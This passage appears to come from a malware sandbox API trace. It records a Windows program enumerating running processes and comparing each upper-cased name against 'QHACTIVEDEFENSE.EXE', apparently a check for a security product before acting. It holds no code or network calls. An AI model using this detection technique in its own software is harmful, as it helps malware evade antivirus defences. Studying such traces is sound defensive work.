(lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.725] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.725] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0162.725] lstrlenW (lpString="audiodg.exe") returned 11 [0162.725] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0162.725] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.725] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.726] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.726] lstrlenW (lpString="svchost.exe") returned 11 [0162.726] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.726] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.726] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.727] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.727] lstrlenW (lpString="svchost.exe") returned 11 [0162.727] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.727] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.727] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.727] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0162.727] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.728] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0162.728] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.728] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.728] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.728] lstrlenW (lpString="svchost.exe") returned 11 [0162.728] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.728] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.728] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.729] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.729] lstrlenW (lpString="taskhost.exe") returned 12 [0162.729] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.729] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.729] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.730] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.730] lstrlenW (lpString="taskeng.exe") returned 11 [0162.730] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.730] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.730] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.730] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0162.730] lstrlenW (lpString="dwm.exe") returned 7 [0162.730] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0162.730] lstrcmpW (lpString1="DWM.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.731] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.731] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0162.731] lstrlenW (lpString="explorer.exe") returned 12 [0162.731] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0162.731] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.731] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.732] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.732] lstrlenW (lpString="taskeng.exe") returned 11 [0162.732] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.732] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.732] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0162.733] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0162.733] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0162.733] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0162.733] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.733] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.733] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.733] lstrlenW (lpString="taskhost.exe") returned 12 [0162.733] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0162.734] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.734] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0162.734] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0162.734] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0162.734] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0162.734] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.734] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0162.735] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0162.735] lstrlenW (lpString="tri.exe") returned 7 [0162.735] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0162.735] lstrcmpW (lpString1="TRI.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.735] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0162.736] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0162.736] lstrlenW (lpString="navigation-jay.exe") returned 18 [0162.736] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0162.736] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.736] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0162.737] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0162.737] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0162.737] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0162.737] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.737] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0162.741] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0162.741] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0162.741] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0162.741] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.741] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0162.741] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0162.741] lstrlenW (lpString="ship-loans.exe") returned 14 [0162.741] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0162.741] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.742] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0162.742] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0162.742] lstrlenW (lpString="isolation.exe") returned 13 [0162.742] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0162.742] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.742] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0162.743] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0162.743] lstrlenW (lpString="abc.exe") returned 7 [0162.743] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0162.743] lstrcmpW (lpString1="ABC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.743] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0162.744] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0162.744] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0162.744] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0162.744] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.744] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0162.744] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0162.745] lstrlenW (lpString="english_performing.exe") returned 22 [0162.745] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0162.745] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.745] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0162.745] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0162.745] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0162.745] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0162.745] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.745] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0162.746] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0162.746] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0162.746] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0162.746] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.746] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0162.747] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0162.747] lstrlenW (lpString="volume.exe") returned 10 [0162.747] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0162.747] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.747] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0162.748] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0162.748] lstrlenW (lpString="rich-zealand.exe") returned 16 [0162.748] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0162.748] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.748] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0162.748] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0162.748] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0162.748] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0162.748] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.748] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0162.749] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0162.749] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0162.749] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0162.749] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.749] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0162.750] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0162.750] lstrlenW (lpString="sayconvenience.exe") returned 18 [0162.750] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0162.750] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.750] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0162.754] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0162.754] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0162.754] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0162.754] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.754] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0162.755] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0162.755] lstrlenW (lpString="EXCEL.EXE") returned 9 [0162.755] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0162.755] lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.755] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.755] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.755] lstrlenW (lpString="svchost.exe") returned 11 [0162.755] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.755] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.755] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0162.756] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0162.756] lstrlenW (lpString="sppsvc.exe") returned 10 [0162.756] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0162.756] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.756] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0162.757] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0162.757] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0162.757] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0162.757] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.757] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.758] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.758] lstrlenW (lpString="svchost.exe") returned 11 [0162.758] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.758] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.758] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.959] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.959] lstrlenW 